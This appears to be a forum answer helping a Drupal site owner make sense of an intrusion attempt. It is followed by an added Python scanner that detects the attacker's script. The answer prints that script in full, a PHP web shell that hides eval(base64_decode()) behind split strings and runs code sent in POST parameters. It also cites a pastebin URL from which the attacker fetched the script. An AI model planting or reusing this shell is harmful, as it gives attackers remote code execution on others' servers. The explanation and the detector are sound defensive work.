Looks like the attacker tries to download the script from this website (https://pastebin.com/raw/PeBdUg98) to your server:
This is the script (it's safe to click this link):
<?php
$st = 'return value';
$cap='bas'.'e6'.'4_d'.'ec'.'ode';
$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // $c = "eval(base64_decode('"
if(isset($_POST['uf']) && isset($_POST['pr'])) {
    $arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);
    array_walk($arr, strval($_POST['pr']), '');
}
?>
And in the second call (to this script - it's safe to click the link) he tries to run a patch on your Drupal.
I don't think that he can get it to work - but you can mimic what he's doing on a dummy website that you'll spin up and see if it actually works.
You can check your access logs, and if all the calls come from the same IP, block it and do a reverse IP lookup to try and find more information about the attacker, possibly report him to his ISP.
Even though it's not phishing you can also try and submit a report here: http://www.google.com/safebrowsing/report_phish/
Good job on staying on the latest version of Drupal - if you've installed plugins try to stay on their latest version as well.
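
To check whether a file like the one quoted above was actually written to the server, here is an added example (not part of the original answer) of a static scanner that flags three traits visible in that script: a function name split across string concatenations, a regex literal carrying the `e` modifier, and a callable-taking function fed from request data. The indicator names, the list of sensitive function names, the threshold of two and the benign comparison file are assumptions made for illustration.

```python
import re

# Script quoted in the answer, embedded as scanner input (it is never executed).
SAMPLE = r"""<?php
$st = 'return value';
$cap='bas'.'e6'.'4_d'.'ec'.'ode';
$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\'';
if(isset($_POST['uf']) && isset($_POST['pr'])) {
$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);
array_walk($arr, strval($_POST['pr']), '');
}
?>"""

# Constructed benign file for comparison.
BENIGN = "<?php $n = array_map('trim', $_POST['names']); echo base64_decode($row['blob']); ?>"

_CONCAT = re.compile(r"'((?:[^'\\]|\\.)*)'\s*\.\s*'")
_SENSITIVE = ("base64_decode", "eval", "assert", "gzinflate", "str_rot13")
_E_MODIFIER = re.compile(r"'([|/#~@!%])[^'\n]*\1[a-zA-Z]*e[a-zA-Z]*'")
_CALLBACK = re.compile(
    r"\b(array_walk|array_map|array_filter|usort|call_user_func(?:_array)?)"
    r"\s*\([^;]*\$_(?:POST|GET|REQUEST|COOKIE)\b")

def collapse_concat(src):
    """Join adjacent single-quoted literals: 'bas'.'e6' becomes 'base6'."""
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: "'" + m.group(1), src)
    return src

def scan(src):
    """Return the sorted names of the indicators found in PHP source text."""
    flat = collapse_concat(src)
    hits = set()
    if any(f"'{n}'" in flat and f"'{n}'" not in src for n in _SENSITIVE):
        hits.add("split_function_name")       # name only appears once rejoined
    if _E_MODIFIER.search(flat):
        hits.add("regex_e_modifier")          # e.g. '|.*|e'
    if _CALLBACK.search(flat):
        hits.add("callable_with_request_data")
    return sorted(hits)

def is_suspicious(src, threshold=2):
    # Each indicator alone has benign uses; require several together.
    return len(scan(src)) >= threshold

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, scan(text), is_suspicious(text))
```

The checks are heuristics: a match means the file deserves a manual look and a comparison against a clean copy of the same release, not that it is confirmed malicious.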